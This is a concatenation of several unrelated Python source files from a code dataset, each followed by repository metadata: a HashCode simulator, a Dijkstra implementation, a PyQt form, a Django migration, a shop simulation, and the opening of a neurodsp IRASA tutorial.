__init__(self,startRoadName,roadDict,travelList):\n\t\tself.start=roadDict[startRoadName]['inter']\n\t\tself.travelList=travelList\n\t\ttotalDist=0\n\t\tfor i in travelList:\n\t\t\ttotalDist+=roadDict[i][\"length\"]\n\t\tself.travelDist=totalDist\n\t\tself.available=False\n\n\ndef readFile(filePath):\n\twith open(filePath, \"r\") as f:\n\t\treturn f.readlines()\n\ndef addWaitingList():\n\tfor i in carObjList:\n\t\tinterObjList[i.start].addWaitingList(i)\n\ndef findAvailableCar():\n\tfor i in carObjList:\n\t\tif simSecs>=i.travelDist:\n\t\t\ti.available=True\n\n\ndef interpreter(totalTxt):\n\tglobal simSecs\n\tglobal interObjList\n\tglobal carObjList\n\tglobal roadDict\n\tinterQuan=0\n\troadQuan=0\n\tcarQuan=0\n\tscore=0\n\tinterObjList={}\n\tcarObjList=[]\n\troadDict={}\n\n\tfor idx, line in enumerate(totalTxt):\n\t\tif idx==0:\n\t\t\tstrList=line.split()\n\t\t\tsimSecs=int(strList[0])\n\t\t\tinterQuan=int(strList[1])\n\t\t\troadQuan=int(strList[2])\n\t\t\tcarQuan=int(strList[3])\n\t\t\tscore=int(strList[4])\n\t\tif idx>=1 and idx<=roadQuan:\n\t\t\tstrList=line.split()\n\t\t\tstartNum=int(strList[0])\n\t\t\tendNum=int(strList[1])\n\t\t\ttry:\n\t\t\t\tif interObjList[startNum]:\n\t\t\t\t\tinterObjList[startNum].addRoad(strList[2],int(strList[1]),int(strList[3]))\n\t\t\texcept:\n\t\t\t\tobj=intersection(startNum)\n\t\t\t\tobj.addRoad(strList[2],int(strList[1]),int(strList[3]))\n\t\t\t\tinterObjList[startNum]=obj\n\t\t\troadDict[strList[2]]={\"inter\":int(strList[1]),\"length\":int(strList[3])}\n\t\tif idx>roadQuan:\n\t\t\tstrList=line.split()\n\t\t\tobj=car(strList[1],roadDict,strList[:1:-1][::-1])\n\t\t\tcarObjList.append(obj)\n\taddWaitingList()\n\tfindAvailableCar()\n\n\n\ntotalTxt=readFile('a.txt')\ninterpreter(totalTxt)\n\n\n\nprint(interObjList[0].waitingList[0])\n\n\n\"\"\"\nglobal simSecs\nglobal interObjList\nglobal carObjList\nglobal roadDict\n\"\"\"","repo_name":"twyunting/HashCode2021","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41008210059","text":"# a=[9,3,5,6]\n# summa=sum(a)\n# import numpy as np\n# l = [1,2,3,4,5]\n# print(\"Summa:\",summa)\n# print(\"Reizinājums:\",np.prod(l))\n# \n\n# Vārds = 'Alberts'[::-1]\n# print(Vārds)\n\npatskani = ['a','ā','e','ē','u','ū','i','ī','o']\nteikums = input(\"Ievadiet tekstu: \")\ncount = 0\nfor letter in teikums:\n if letter in patskani:\n count += 1\nprint(count)","repo_name":"AnnaLaz/07.12.21","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23864657076","text":"#!/usr/bin/python\n\"\"\"\nReads a beersmith recipe and creates stages file\nRuns basic checks against controllers\n\n\"\"\"\n\nimport sys\nsys.path.append(\"/home/mikael/workspace/hoppity/src\")\nimport ctrl\nimport argparse\nimport recipeReader\nimport json\nimport equipment\nimport os\nimport xml.etree.ElementTree\nimport checker\nimport logging\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Load files to S3')\n parser.add_argument('-i', '--inputfile', default=None, help='Input beersmith file')\n parser.add_argument('-o', '--outputfile', default=None, help='Output stages file')\n parser.add_argument('-d', '--debug', action='store_true', help='Set log level to debug')\n parser.add_argument('-e', '--error', action='store_true', help='Set log level to debug')\n args = parser.parse_args()\n\n if args.debug:\n loglevel = logging.DEBUG\n elif args.error:\n loglevel = logging.ERROR\n else:\n loglevel = logging.INFO\n\n\n logging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=loglevel,\n stream=sys.stdout)\n\n if args.inputfile is None:\n inf = sys.stdin\n else:\n #testing\n print(\"==================================> {}\".format(args.inputfile))\n \n try:\n inf = open(args.inputfile, 'r')\n except:\n print(\"Can not open inputfile\")\n sys.exit(1)\n if args.outputfile is None:\n outf = sys.stdout\n else:\n try:\n outf = open(args.outputfile, 'w')\n except:\n print(\"Can not open outputfile {}\".format(args.outputfile))\n sys.exit(1)\n bsmxIn = inf.read()\n bsmxStr = bsmxIn.replace('&', 'AMP')\n inf.close()\n \n e = xml.etree.ElementTree.fromstring(bsmxStr)\n equipmentName = e.find('Data').find('Recipe').find('F_R_EQUIPMENT').find('F_E_NAME').text\n print('Equipment: {}'.format(equipmentName))\n mypath = os.path.dirname(os.path.realpath(__file__))\n availableEquipment = equipment.allEquipment(mypath + '/equipment/*.yaml')\n myEquipment = availableEquipment.get(equipmentName)\n controllers = ctrl.setupControllers(False, True, True, myEquipment)\n\n bsmxObj = recipeReader.bsmxStages(bsmxStr, controllers)\n stagesStr = bsmxObj.getStages()\n if stagesStr is None:\n print('Error: Invalid recipe')\n sys.exit(1)\n\n equipmentchecker = checker.equipment(controllers, stagesStr)\n if not equipmentchecker.check():\n print(\"Error: equipment vs recipe validation failed\")\n sys.exit(1)\n\n # Debug print the dispensers\n #hops = bsmxObj.ingredientsHops()\n #misc = bsmxObj.ingredientsMisc()\n\n json.dump(stagesStr, outf, sort_keys=True,\n indent=2, separators=(',', ': '))\n outf.close()\n bsmxObj.compareStrikeTemp()\n\n","repo_name":"cloudymike/hopitty","sub_path":"src/bsmx2stages.py","file_name":"bsmx2stages.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37123285088","text":"\"\"\"\nImplementation of Dijkstra Algorithm using Textbook Pseudocode.\n\"\"\"\nimport math\nimport time\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass Graph:\n \"\"\"\n Analyzes adjacency matrices and implements Dikjstra's Algorithm.\n\n Attributes:\n graph: an adjacency matrix representing a graph with weighted edges.\n vertices: an integer representing the number of vertices in the graph.\n \"\"\"\n\n INF = math.inf\n\n def __init__(self, graph):\n \"\"\"\n Initialize the attributes of the class.\n \"\"\"\n self.graph = graph\n self.vertices = len(graph)\n\n def get_weights(self, v_i, v_j):\n \"\"\"\n Given two vertices, return the weight between the two.\n\n Args:\n v_i: an integer representing the first vertex.\n v_j: an integer representing the second vertex.\n\n Returns: an integer that represents the weight between the two vertices.\n \"\"\"\n\n weight = self.graph[v_i][v_j]\n return weight\n\n def visualize_graph(self):\n \"\"\"\n Visualize a graph in adjacency matrix form given the matrix and number of vertex\n and save file in Graphs folder.\n\n Args:\n self: an instance of the Graph class.\n \"\"\"\n graph_viz = nx.DiGraph()\n for row in range(self.vertices):\n for column in range(self.vertices):\n edge_weight = self.get_weights(row, column)\n if edge_weight > 0:\n graph_viz.add_edge(row, column, weight=edge_weight)\n pos = nx.spring_layout(graph_viz)\n nx.draw(graph_viz, pos, node_color=\"orange\", with_labels=True)\n # specifiy edge labels explicitly\n edge_labels = dict(\n [\n (\n (\n u,\n v,\n ),\n d[\"weight\"],\n )\n for u, v, d in graph_viz.edges(data=True)\n ]\n )\n nx.draw_networkx_edge_labels(graph_viz, pos, edge_labels=edge_labels)\n graph_time = str(time.time())[-4:]\n plt.show(block=False)\n plt.savefig(\n f\"Graphs/graph_{graph_time}.PNG\", format=\"PNG\", facecolor=\"aliceblue\"\n )\n plt.cla()\n plt.clf()\n\n def dijkstra(self, source, end):\n \"\"\"\n Dijkstra's Algorithm that finds the shortest path from one vertex\n to another given all weights assigned to edges.\n\n Args:\n self: an instance of the Graph class.\n source: an integer representing the starting vertex.\n end: an integer representing the ending vertex.\n\n Returns: an integer representing the shortest path from source to end\n \"\"\"\n\n visited_nodes = []\n unvisited_nodes = []\n\n # Append all nodes to unvisited list\n for i in range(self.vertices):\n unvisited_nodes.append(i)\n current_node = source\n\n # Create a list with the source and infinities\n shortest_path = [self.INF] * self.vertices\n shortest_path[source] = 0\n\n while end not in visited_nodes:\n min_value = self.INF\n min_value_index = None\n for i, dist_value in enumerate(shortest_path):\n if dist_value < min_value and i not in visited_nodes:\n # length of shortest path neighbor\n min_value = dist_value \n # index of shortest path neighbor\n min_value_index = i\n if current_node in unvisited_nodes:\n visited_nodes.append(current_node)\n unvisited_nodes.remove(current_node)\n for node in unvisited_nodes:\n # Get edge weight\n edge_weight = self.get_weights(current_node, node)\n # If the weight is not zero...\n if edge_weight != 0:\n # If the current shortest path plus the edge weight is less than\n # the shortest path of node, update the shortest path\n if shortest_path[current_node] + edge_weight < shortest_path[node]:\n shortest_path[node] = shortest_path[current_node] + edge_weight\n # Go to the next node\n current_node = min_value_index\n return shortest_path[end]\n","repo_name":"prishabhatia20/Shortest-Path-Algorithm","sub_path":"shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22299889449","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(808, 648)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 556))\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName(\"tab\")\n self.listWidget = QtWidgets.QListWidget(self.tab)\n self.listWidget.setGeometry(QtCore.QRect(80, 110, 256, 200))\n self.listWidget.setObjectName(\"listWidget\")\n self.tabWidget.addTab(self.tab, \"\")\n\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName(\"tab_2\")\n self.ComboBox = QtWidgets.QComboBox(self.tab_2)\n self.ComboBox.setGeometry(QtCore.QRect(40, 70, 86, 25))\n self.ComboBox.setObjectName(\"ComboBox\")\n self.ButtonComboBox = QtWidgets.QPushButton(self.tab_2)\n self.ButtonComboBox.setGeometry(QtCore.QRect(40, 130, 89, 25))\n self.ButtonComboBox.setObjectName(\"ButtonComboBox\")\n self.groupBox = QtWidgets.QGroupBox(self.tab_2)\n self.groupBox.setGeometry(QtCore.QRect(320, 20, 441, 461))\n self.groupBox.setObjectName(\"groupBox\")\n self.tabWidget.addTab(self.tab_2, \"\")\n\n\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName(\"tab_3\")\n self.pushButton_SQB = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_SQB.setGeometry(QtCore.QRect(20, 30, 211, 81))\n self.pushButton_SQB.setObjectName(\"SelectQueryButton\")\n\n\n self.groupBoxQPRICE = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxQPRICE.setGeometry(QtCore.QRect(250, 30, 150, 80))\n self.groupBoxQPRICE.setObjectName(\"groupBoxTabT3\")\n self.radioButN = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButN.setGeometry(QtCore.QRect(5, 10, 100, 15))\n self.radioButN.setObjectName(\"radioButN\")\n self.radioButB = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButB.setGeometry(QtCore.QRect(5, 30, 150, 15))\n self.radioButB.setObjectName(\"radioButB\")\n self.radioButM = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButM.setGeometry(QtCore.QRect(5, 50, 150, 15))\n self.radioButM.setObjectName(\"radioButM\")\n\n self.groupBoxCheck = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxCheck.setGeometry(QtCore.QRect(410, 30, 150, 80))\n self.groupBoxCheck.setObjectName(\"groupBoxCheck\")\n self.check_date = QtWidgets.QCheckBox(self.groupBoxCheck)\n self.check_date.setGeometry(QtCore.QRect(5, 15, 120, 20))\n self.check_date.setObjectName(\"groupBoxCheck\")\n self.check_phone = QtWidgets.QCheckBox(self.groupBoxCheck)\n self.check_phone.setGeometry(QtCore.QRect(5, 45, 120, 20))\n self.check_phone.setObjectName(\"groupBoxCheck\")\n\n self.groupBoxT3 = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3.setGeometry(QtCore.QRect(20, 130, 370, 300))\n self.groupBoxT3.setObjectName(\"groupBoxTabT3\")\n self.LabelCTName = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCTName.setGeometry(QtCore.QRect(40, 70, 86, 25))\n self.LabelCTName.setObjectName(\"LabelCTName\")\n self.ComboBoxT3Tname = QtWidgets.QComboBox(self.groupBoxT3)\n self.ComboBoxT3Tname.setGeometry(QtCore.QRect(40, 100, 86, 25))\n self.ComboBoxT3Tname.setObjectName(\"ComboBoxT3Tname\")\n self.LabelCinfo = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCinfo.setGeometry(QtCore.QRect(120, 20, 100, 25))\n self.LabelCinfo.setObjectName(\"LabelCinfo\")\n self.LabelCCName = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCCName.setGeometry(QtCore.QRect(170, 70, 100, 25))\n self.LabelCCName.setObjectName(\"LabelCTName\")\n self.ComboBoxT3Cname = QtWidgets.QComboBox(self.groupBoxT3)\n self.ComboBoxT3Cname.setGeometry(QtCore.QRect(150, 100, 100, 25))\n self.ComboBoxT3Cname.setObjectName(\"ComboBoxT3Cname\")\n\n self.groupBoxT3Q = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3Q.setGeometry(QtCore.QRect(400, 130, 370, 300))\n self.groupBoxT3Q.setObjectName(\"groupBoxT3Q\")\n self.ReqLine = QtWidgets.QLineEdit(self.groupBoxT3Q)\n self.ReqLine.setGeometry(QtCore.QRect(75, 120, 220, 30))\n self.ReqLine.setObjectName(\"ReqLine\")\n self.pushButton_FIND = QtWidgets.QPushButton(self.groupBoxT3Q)\n self.pushButton_FIND.setGeometry(QtCore.QRect(140, 220, 100, 50))\n self.pushButton_FIND.setObjectName(\"pushButton_FIND\")\n self.LabelLCinfo = QtWidgets.QLabel(self.groupBoxT3Q)\n self.LabelLCinfo.setGeometry(QtCore.QRect(130, 20, 200, 50))\n self.LabelLCinfo.setObjectName(\"LabelLCinfo\")\n\n self.groupBoxT3Sale = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3Sale.setGeometry(QtCore.QRect(400, 435, 370, 60))\n self.groupBoxT3Sale.setObjectName(\"groupBoxT3Sale\")\n self.radioButSnot = QtWidgets.QRadioButton(self.groupBoxT3Sale)\n self.radioButSnot.setGeometry(QtCore.QRect(5, 25, 100, 15))\n self.radioButSnot.setObjectName(\"radioButSnot\")\n self.radioButSale = QtWidgets.QRadioButton(self.groupBoxT3Sale)\n self.radioButSale.setGeometry(QtCore.QRect(110, 25, 100, 15))\n self.radioButSale.setObjectName(\"radioButSale\")\n self.ReqLineSale = QtWidgets.QLineEdit(self.groupBoxT3Sale)\n self.ReqLineSale.setGeometry(QtCore.QRect(220, 20, 100, 25))\n self.ReqLineSale.setObjectName(\"ReqLineSale\")\n self.LabelLProc = QtWidgets.QLabel(self.groupBoxT3Sale)\n self.LabelLProc.setGeometry(QtCore.QRect(330, 20, 100, 25))\n self.LabelLProc.setObjectName(\"LabelLProc\")\n\n self.tabWidget.addTab(self.tab_3, \"\")\n\n\n self.verticalLayout.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 808, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"RGZ_DB\"))\n self.pushButton_SQB.setText(_translate(\"MainWindow\", \"Выполнить\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"Просмотр Таблиц\"))\n self.ButtonComboBox.setText(_translate(\"MainWindow\", \"Select DB\"))\n self.groupBox.setTitle(_translate(\"MainWindow\", \"GroupBox\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"Добавление Данных\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \"Выборка\"))\n self.radioButN.setText(_translate(\"MainWindow\", \"Defolt\"))\n self.radioButB.setText(_translate(\"MainWindow\", \"Цена >= 1000\"))\n self.radioButM.setText(_translate(\"MainWindow\", \"Цена < 1000\"))\n self.pushButton_FIND.setText(_translate(\"MainWindow\", \"Найти\"))\n self.LabelCTName.setText(_translate(\"MainWindow\", \"Таблица\"))\n self.LabelCCName.setText(_translate(\"MainWindow\", \"Поле\"))\n self.LabelCinfo.setText(_translate(\"MainWindow\", \"Выбор\"))\n self.check_date.setText(_translate(\"MainWindow\", \"Дата\"))\n self.check_phone.setText(_translate(\"MainWindow\", \"Телефон\"))\n self.LabelLCinfo.setText(_translate(\"MainWindow\", \"Текст для поиска\"))\n self.radioButSale.setText(_translate(\"MainWindow\", \"Скидка:\"))\n self.radioButSnot.setText(_translate(\"MainWindow\", \"Поиск\"))\n self.LabelLProc.setText(_translate(\"MainWindow\", \"%\"))","repo_name":"TarriestZero/DB_GUI_RGZ","sub_path":"design.py","file_name":"design.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219695263","text":"import uuid\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('kanban_boards', '0019_kanbanboard_description'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='KanbanBoardUserSetting',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('restrict_task_information', models.BooleanField(db_index=True, default=False, verbose_name='Whether the task information should be restricted in this Kanban Board')),\n ('day_indication', models.BooleanField(db_index=True, default=False, verbose_name='Whether the day indications for this Kanban Board should be shown')),\n ('created_at', models.DateTimeField(auto_now_add=True, db_index=True, null=True, verbose_name='Date when this element was created')),\n ('last_modified_at', models.DateTimeField(auto_now=True, db_index=True, null=True, verbose_name='Date when this element was last modified')),\n ('kanban_board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='kanban_board_user_settings', to='kanban_boards.KanbanBoard', verbose_name='Which kanban board is this user setting for')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='User')),\n ],\n options={\n 'verbose_name': 'Kanban Board User Setting',\n 'verbose_name_plural': 'Kanban Board User Settings',\n 'unique_together': {('kanban_board', 'user')},\n 'index_together': {('kanban_board', 'user')},\n },\n ),\n ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/kanban_boards/migrations/0020_kanbanboardusersetting.py","file_name":"0020_kanbanboardusersetting.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"71859365684","text":"import json\n\n\n# 获取json数据\ndef get_json():\n with open('D:/毕设/项目(开发版本)/json/china_json.json', 'r', encoding='utf8') as f:\n json_data = json.load(f)\n city_coord = {}\n for item in json_data:\n # 地级市名\n city_name = item[\"name\"]\n # 经度\n log_coord = item[\"log\"]\n log = float(log_coord)\n # 纬度\n lat_coord = item[\"lat\"]\n lat = float(lat_coord)\n city_coord[city_name] = [log, lat]\n # 将整理后的json保存在dicts中\n dicts = city_coord\n return dicts\n\n\n# 写入json文件\ndef write_json(dict_json):\n with open('D:/毕设/项目(开发版本)/json/china_coordinate.json', 'w', encoding='utf-8') as r:\n # print(dict_json)\n # 写入文件并序列化\n json.dump(dict_json, r, ensure_ascii=False, indent=4)\n\n\nfile = get_json()\nwrite_json(file)\n","repo_name":"Miukiya/CBECgoodsdata-visualization-python","sub_path":"Python_china_coord/china_coord_file.py","file_name":"china_coord_file.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9454830171","text":"from dataclasses import dataclass, field\nfrom typing import List\nimport csv\n\nchoice = \"\"\nsection = '========================================================================================'\n\n@dataclass\nclass Product:\n name: str\n price: float = 0.0\n\n@dataclass \nclass ProductStock:\n product: Product\n quantity: int\n\n@dataclass \nclass Shop:\n cash: float = 0.0\n stock: List[ProductStock] = field(default_factory=list)\n\n@dataclass\nclass Customer:\n name: str = \"\"\n budget: float = 0.0\n shopping_list: List[ProductStock] = field(default_factory=list)\n\ndef create_and_stock_shop():\n s = Shop()\n with open('../stock.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n first_row = next(csv_reader)\n s.cash = float(first_row[0])\n for row in csv_reader:\n p = Product(row[0], float(row[1]))\n ps = ProductStock(p, float(row[2]))\n s.stock.append(ps)\n #print(ps)\n return s\n \ndef read_customer(file_path):\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n first_row = next(csv_reader)\n c = Customer(first_row[0], float(first_row[1]))\n for row in csv_reader:\n name = row[0]\n quantity = float(row[1])\n p = Product(name)\n ps = ProductStock(p, quantity)\n c.shopping_list.append(ps)\n return c \n\ndef buy_items(customer, shop, single):\n instock = 1\n cost = 0\n error = 0\n x = 0\n for item in customer.shopping_list: \n\n for i in shop.stock:\n\n if item.product.name == i.product.name:\n instock = 1\n\n if item.quantity <= i.quantity:\n cost += item.quantity * i.product.price\n shop.stock[x].quantity = shop.stock[x].quantity - item.quantity\n\n else:\n print(f\"{item.product.name} NOT ENOUGH IN STOCK.\")\n error = 1\n break\n\n break\n\n else:\n instock = 0\n x+=1\n\n if instock == 0:\n print(f\"{item.product.name} IS NOT IN THIS SHOP.\") \n printf(\"\\ntest\");\n error = 1\n\n cost = round(cost, 2)\n\n if cost > customer.budget:\n print('INSUFFICIENT FUNDS')\n error = 1\n \n if error == 1:\n print('INVALID PURCHASE')\n return customer, shop\n else:\n shop.cash = round(shop.cash + cost, 2)\n customer.budget = round(customer.budget - cost,2)\n print(\"SUCCESSFUL PURCHASE\")\n print(f'COST: {cost}')\n if single != 1:\n customer.shopping_list = []\n return customer, shop\n\ndef update_shop(s):\n new_list = list()\n new_list.append([s.cash])\n for item in s.stock:\n new_list.append([item.product.name, item.product.price, item.quantity])\n\n new_shop = open('..\\stock.csv', 'w', newline = '')\n csv_writer = csv.writer(new_shop)\n csv_writer.writerows(new_list)\n new_shop.close()\n\ndef update_customer(c, file):\n new_list = list()\n new_list.append([c.name, c.budget])\n for item in c.shopping_list:\n new_list.append([item.product.name, item.quantity])\n\n new_customer = open(file, 'w', newline = '')\n csv_writer = csv.writer(new_customer)\n csv_writer.writerows(new_list)\n new_customer.close()\n\ndef add_to_list(c):\n p = Product(input('Product Name: '))\n quant = int(input('Quantity: '))\n ps = ProductStock(p, quant)\n c.shopping_list.append(ps)\n return c\n \n\ndef print_product(p):\n print(f'\\nPRODUCT NAME: {p.name} \\nPRODUCT PRICE: {p.price}')\n\ndef print_customer(c):\n print(f'CUSTOMER NAME: {c.name} \\nCUSTOMER BUDGET: {c.budget}')\n \n for item in c.shopping_list:\n print_product(item.product)\n \n print(f'{c.name} ORDERS {item.quantity} OF ABOVE PRODUCT')\n cost = item.quantity * item.product.price\n print(f'The cost to {c.name} will be €{cost}')\n \ndef print_shop(s):\n print(f'Shop has {s.cash} in cash')\n for item in s.stock:\n print_product(item.product)\n print(f'The Shop has {item.quantity} of the above')\n\nfile = \"../customer.csv\"\n\nc = read_customer(file)\n\ns = create_and_stock_shop()\n\nwhile True:\n\n print(section)\n print(\"WELCOME\", c.name, \"\\n1) Show Shop. \\n2) Show Customer Shopping List.\\n3) Buy Specific Item.\\n4) Buy Items. \\n5) Select Customer.\\n6) Add to Shopping List. \\n7) Exit\")\n\n choice = input(\"ENTER NUMBER FOR OPTION: \")\n\n choice = choice.strip()\n\n if (choice == '1'):\n print(section)\n print_shop(s)\n\n elif (choice == '2'):\n print(section)\n print_customer(c)\n\n elif (choice == '3'):\n print(section)\n p = Product(input('Product Name: '))\n quant = int(input('Quantity: '))\n ps = ProductStock(p, quant)\n c2 = c\n c2.shopping_list = []\n c2.shopping_list.append(ps)\n buy_items(c2, s, 0)\n update_shop(s)\n\n elif (choice == '4'):\n print(section)\n c, s = buy_items(c, s, 0)\n print(s.cash)\n update_shop(s)\n update_customer(c, file)\n\n\n elif (choice == '5'):\n print(section)\n print('1) John(Succesful Purchase)(DEFAULT)')\n print('2) Cantof(Insufficient Funds)')\n print('3) Mrs400Loaves (Insufficient Stock)')\n\n read_c = input('Input Number of Which Customer you Wish to be: ')\n if (read_c == '1'):\n file = \"../customer.csv\"\n elif (read_c == '2'):\n file = \"../MrCantofCoke.csv\"\n elif (read_c == '3'):\n file = \"../Mrs400loaves.csv\"\n\n c = read_customer(file)\n \n elif (choice == '6'):\n add_to_list(c)\n update_customer(c, file)\n\n elif (choice == '7'):\n print(section)\n break\n\n else:\n print(section)\n print('INVALID OPTION, PLEASE ENTER A VALID NUMBER')","repo_name":"StephenCaulfield/MPP","sub_path":"G00000001 - Dominic Carr - Assignment 1/python proc/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2482670217","text":"#!/usr/bin/env python\n# coding: utf-8\n# %%\n\n\nimport timm\nfrom fastai.vision.all import *\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport glob\n\nroot_dir = \"/media/hdd/ART/Refs/\"\nnew_path = Path(root_dir)/\"temporary_acceptance\"\npredictions_path = Path(\"/home/eragon/Downloads/new_references\")\n\ndef predict_batch(self, item, rm_type_tfms=None, with_input=False):\n dl = self.dls.test_dl(item, rm_type_tfms=rm_type_tfms, num_workers=0)\n ret = self.get_preds(dl=dl,with_input=False, with_decoded=True)\n return ret\nLearner.predict_batch = predict_batch\n\nlearn = load_learner(\"export.pkl\")\n\ntst_files = get_image_files(predictions_path)\n\nprint(len(tst_files))\n\nclasses = learn.dls.vocab\n\npreds = learn.predict_batch(tst_files)\npreds_mapped = list(map(lambda x: classes[int(x)] , preds[2]))\n\nfor i,file in enumerate(tst_files):\n temp_path = new_path/preds_mapped[i]\n temp_path.mkdir(exist_ok=True, parents=True)\n shutil.move(file, temp_path)\n\n\n# %%\n\n\n\n\n","repo_name":"utility-code/ArtHelper","sub_path":".ipynb_checkpoints/predictions-checkpoint.py","file_name":"predictions-checkpoint.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"27688252661","text":"import pdb\nclass Solution(object):\n def maxSlidingWindow(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n retVal = []\n m = 0\n for x in range(0, len(nums)-k):\n retVal.append(max(nums[x:x+k]))\n return retVal\n\nprint(Solution().maxSlidingWindow([1,3,-1,-3,5,3,6,7], 3))\n\n","repo_name":"akuchlous/leetcode","sub_path":"sliding.py","file_name":"sliding.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1611769334","text":"\"\"\"\nIRASA\n=====\n\nSeparate periodic and aperiodic activity with the IRASA algorithm.\n\nThe irregular resampling auto-spectral analysis (IRASA) algorithm is a method for\nseparating aperiodic (1/f) and oscillatory activity in the frequency domain.\n\nThe algorithm leverages the 'scale-free' nature of 1/f activity, resampling the data in order\nto separate activity with a characteristic frequency (such as periodic activity) from\nscale-free activity.\n\nBriefly, this method involves:\n\n1. Up- & down-sampling the signal across a range of increments.\n2. Computing the geometric mean spectra for each pair of up/down sampled signals.\n3. Estimating the aperiodic component from the median spectrum across the range of increments.\n4. Estimating the periodic component from the difference between the aperiodic estimate and the\n original spectrum.\n\nFull details of the IRASA algorithm are described in\n`Wen & Liu, 2016 `_.\n\nThis tutorial covers ``neurodsp.aperiodic.irasa``.\n\"\"\"\n\n###################################################################################################\n\n# sphinx_gallery_thumbnail_number = 2\n\nimport numpy as np\nfrom neurodsp.sim import sim_combined\nfrom neurodsp.spectral import compute_spectrum, trim_spectrum\nfrom neurodsp.plts import plot_power_spectra\n\n# Import IRASA related functions\nfrom neurodsp.aperiodic import compute_irasa, fit_irasa\n\n###################################################################################################\n# Simulate Data\n# -------------\n#\n# To explore the IRASA algorithm, we'll use a simulated signal, with a combination of\n# aperiodic 1/f and oscillatory activity.\n#\n\n###################################################################################################\n\n# Simulation settings\nn_seconds = 10\nfs = 500\n\n# Define the parameters of the simulated components\ncf = 10\nexp = -2\n\n# Define the components for the simulated signal\ncomponents = {'sim_oscillation' : {'freq' : cf},\n 